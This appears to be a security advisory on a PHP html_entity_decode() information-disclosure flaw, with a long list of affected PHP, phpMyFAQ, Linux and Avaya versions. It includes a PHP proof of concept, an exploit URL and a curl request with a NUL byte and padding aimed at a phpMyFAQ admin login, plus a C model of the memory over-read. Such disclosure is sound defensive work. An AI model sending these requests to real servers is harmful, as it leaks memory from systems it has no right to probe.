RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Desktop 4.0
RedHat Desktop 3.0
Red Hat Fedora Core3
Red Hat Fedora Core2
Red Hat Fedora Core1
Red Hat Enterprise Linux AS 4
Red Hat Enterprise Linux AS 3
phpMyFAQ phpMyFAQ 1.5.4
phpMyFAQ phpMyFAQ 1.5.3
phpMyFAQ phpMyFAQ 1.5.1
phpMyFAQ phpMyFAQ 1.5 RC5
phpMyFAQ phpMyFAQ 1.5 RC4
phpMyFAQ phpMyFAQ 1.5 RC3
phpMyFAQ phpMyFAQ 1.5 RC2
phpMyFAQ phpMyFAQ 1.5 RC1
phpMyFAQ phpMyFAQ 1.5 beta3
phpMyFAQ phpMyFAQ 1.5 beta2
phpMyFAQ phpMyFAQ 1.5 beta1
phpMyFAQ phpMyFAQ 1.5 alpha2
phpMyFAQ phpMyFAQ 1.5 alpha1
phpMyFAQ phpMyFAQ 1.5
phpMyFAQ phpMyFAQ 1.4.9
phpMyFAQ phpMyFAQ 1.4.8
phpMyFAQ phpMyFAQ 1.4.7
phpMyFAQ phpMyFAQ 1.4.6
phpMyFAQ phpMyFAQ 1.4.5
phpMyFAQ phpMyFAQ 1.4.4
phpMyFAQ phpMyFAQ 1.4.3
phpMyFAQ phpMyFAQ 1.4.2
phpMyFAQ phpMyFAQ 1.4.1
phpMyFAQ phpMyFAQ 1.4 a
phpMyFAQ phpMyFAQ 1.4 -alpha 2
phpMyFAQ phpMyFAQ 1.4 -alpha 1
phpMyFAQ phpMyFAQ 1.4
phpMyFAQ phpMyFAQ 1.3.13
phpMyFAQ phpMyFAQ 1.3.12
PHP PHP 5.1.2
+ Ubuntu Ubuntu Linux 6.06 LTS sparc
+ Ubuntu Ubuntu Linux 6.06 LTS powerpc
+ Ubuntu Ubuntu Linux 6.06 LTS i386
+ Ubuntu Ubuntu Linux 6.06 LTS amd64
PHP PHP 5.1.1
PHP PHP 5.1
PHP PHP 5.0.5
PHP PHP 5.0.4
PHP PHP 5.0.3
PHP PHP 5.0.2
PHP PHP 5.0.1
PHP PHP 5.0 candidate 3
PHP PHP 5.0 candidate 2
PHP PHP 5.0 candidate 1
PHP PHP 5.0.0
PHP PHP 4.4.2
PHP PHP 4.4.1
PHP PHP 4.4.0
PHP PHP 4.3.11
PHP PHP 4.3.10
+ Gentoo Linux
+ Red Hat Fedora Core3
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
+ Trustix Secure Linux 1.5
PHP PHP 4.3.9
PHP PHP 4.3.8
PHP PHP 4.3.7
PHP PHP 4.3.6
PHP PHP 4.3.5
PHP PHP 4.3.4
+ MandrakeSoft Corporate Server 3.0 x86_64
+ MandrakeSoft Corporate Server 3.0
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
+ S.u.S.E. Linux Personal 9.1
PHP PHP 4.3.3
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ Turbolinux Home
+ Turbolinux Turbolinux 10 F...
+ Turbolinux Turbolinux Desktop 10.0
PHP PHP 4.3.2
PHP PHP 4.3.1
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ OpenPKG OpenPKG Current
+ S.u.S.E. Linux Personal 8.2
PHP PHP 4.3
Gentoo Linux
Avaya S8710 R2.0.1
Avaya S8710 R2.0.0
Avaya S8700 R2.0.1
Avaya S8700 R2.0.0
Avaya S8500 R2.0.1
Avaya S8500 R2.0.0
Avaya S8300 R2.0.1
Avaya S8300 R2.0.0
Avaya Messaging Storage Server MM3.0
Avaya Messaging Storage Server
Avaya Message Networking
Avaya Intuity LX
Avaya Interactive Response
Avaya Integrated Management
Avaya CVLAN
Avaya Converged Communications Server 2.0
Apple Mac OS X Server 10.4.8
Apple Mac OS X Server 10.3.9
Apple Mac OS X 10.4.8
Apple Mac OS X 10.3.9
PHP PHP 5.1.3-RC1

- Unaffected versions

PHP PHP 5.1.3-RC1

- Discussion

The PHP 'html_entity_decode()' function is prone to an information-disclosure vulnerability. This issue arises when a script using the function accepts data from a remote untrusted source and returns the function's result to an attacker.

Information that the attacker gathers by exploiting this vulnerability may aid in other attacks.

PHP versions prior to 5.1.3-RC1 are vulnerable to this issue.

- Exploit

An exploit is not required.

The following proofs of concept are available:

<?php

$foobar=html_entity_decode($_GET['foo']);
echo $foobar;

?>

Running it with the URL:

http://www.example.com/index.php?foo=%00sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss


curl "http://www.example.com/phpmyfaq/admin/index.php" -D - -d "faqusername=%00VERYLONGSTRINGHEREEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
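Both requests above send a NUL byte (%00) followed by long padding. The following is an added example, not code from PHP or from this advisory: a simplified model of a "binary safety" mismatch, in which a length-tracked string is duplicated with a NUL-terminated copy while the original length is kept, shown beside the binary-safe form. The type `lstr` and the functions `dup_unsafe`, `dup_safe` and `overread` are hypothetical names, and the mechanism is an assumption made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical length-tracked string: the runtime outputs `len` bytes of `buf`. */
typedef struct { char *buf; size_t len; size_t alloc; } lstr;

/* NOT binary-safe: the copy stops at the first NUL, yet the caller's length is kept. */
lstr dup_unsafe(const char *src, size_t len) {
    size_t n = strlen(src);                 /* 0 when the input begins with %00 */
    lstr out = { malloc(n + 1), len, n + 1 };
    if (!out.buf) abort();
    memcpy(out.buf, src, n + 1);
    return out;
}

/* Binary-safe: copy exactly `len` bytes, embedded NULs included. */
lstr dup_safe(const char *src, size_t len) {
    lstr out = { malloc(len + 1), len, len + 1 };
    if (!out.buf) abort();
    memcpy(out.buf, src, len);
    out.buf[len] = '\0';
    return out;
}

/* Bytes an output routine writing `len` bytes would read past the allocation. */
size_t overread(const lstr *s) {
    return s->len > s->alloc ? s->len - s->alloc : 0;
}

int main(void) {
    /* Constructed input: a NUL byte followed by 300 bytes of padding. */
    char in[301];
    in[0] = '\0';
    memset(in + 1, 's', 300);
    lstr u = dup_unsafe(in, sizeof in), s = dup_safe(in, sizeof in);
    printf("unsafe: alloc=%zu len=%zu overread=%zu\n", u.alloc, u.len, overread(&u));
    printf("safe:   alloc=%zu len=%zu overread=%zu\n", s.alloc, s.len, overread(&s));
    free(u.buf);
    free(s.buf);
    return 0;
}
```

The example only computes the size of the mismatch and never reads outside its buffers; in the unsafe case every byte of padding after the NUL corresponds to one byte of adjacent memory that would be sent to the client.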

- Solution

Reports indicate that this issue has been addressed in PHP 5.1.3-RC1, but Symantec could not confirm this. Please contact the vendor for more information.

Please see the referenced vendor advisories for details.


S.u.S.E. Linux Professional 10.0

Trustix Secure Linux 2.2

PHP PHP 4.3.10

PHP PHP 4.3.3

PHP PHP 4.3.4

PHP PHP 4.3.9

PHP PHP 5.0.5

- References

 

 
